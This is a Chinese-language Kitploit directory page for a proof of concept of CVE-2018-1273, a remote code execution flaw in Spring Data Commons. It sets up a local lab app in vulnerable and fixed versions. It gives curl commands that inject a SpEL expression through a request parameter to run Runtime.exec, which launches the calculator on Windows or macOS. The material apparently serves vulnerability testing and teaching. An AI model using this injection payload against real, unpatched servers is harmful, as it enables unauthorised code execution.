Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
poc-cve-2018-1273 — POC for CVE-2018-1273 | Kitploit
工具/GitHubGitHub/wearearima/poc-cve-2018-1273
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubwearearima/poc-cve-2018-1273

poc-cve-2018-1273

POC for CVE-2018-1273

查看仓库
24108年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2018-1273

Spring Data Commons,版本1.13至1.13.10、2.0至2.0.5以及更旧的未支持版本,存在一个由未正确转义特殊元素引起的属性绑定器漏洞。未经身份验证的远程恶意用户(或攻击者)可以向基于Spring Data REST的HTTP资源提供特制的请求参数,或使用Spring Data的基于投影的请求有效负载绑定,从而导致远程代码执行攻击。

更多信息请参见

运行

该应用程序可以使用易受攻击版本或已修复版本的Spring Data Commons进行测试。

  • 易受攻击版本(默认):
root@kitploit:~
mvn spring-boot:run
  • 已修复版本:
root@kitploit:~
mvn spring-boot:run -Dfixed

测试漏洞

运行以下命令以检查该漏洞是否可被利用:

  • 在Windows上:
root@kitploit:~
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"

  • 在MacOS上:
root@kitploit:~
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')]=test"

致谢

由 https://www.arima.eu 创建

ARIMA软件设计

下载工具